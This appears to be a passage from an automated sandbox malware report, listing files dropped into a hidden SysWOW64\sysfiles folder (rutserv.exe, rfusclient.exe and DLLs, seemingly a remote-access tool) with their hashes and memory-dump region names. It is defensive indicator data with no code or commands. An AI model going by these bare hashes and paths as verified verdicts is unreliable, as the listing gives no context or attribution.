SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/1412-135-0x0000000000240000-0x0000000000241000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1984-138-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/1992-149-0x0000000000260000-0x0000000000261000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1840-152-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/832-161-0x0000000000240000-0x0000000000241000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

memory/1756-178-0x0000000000230000-0x0000000000231000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6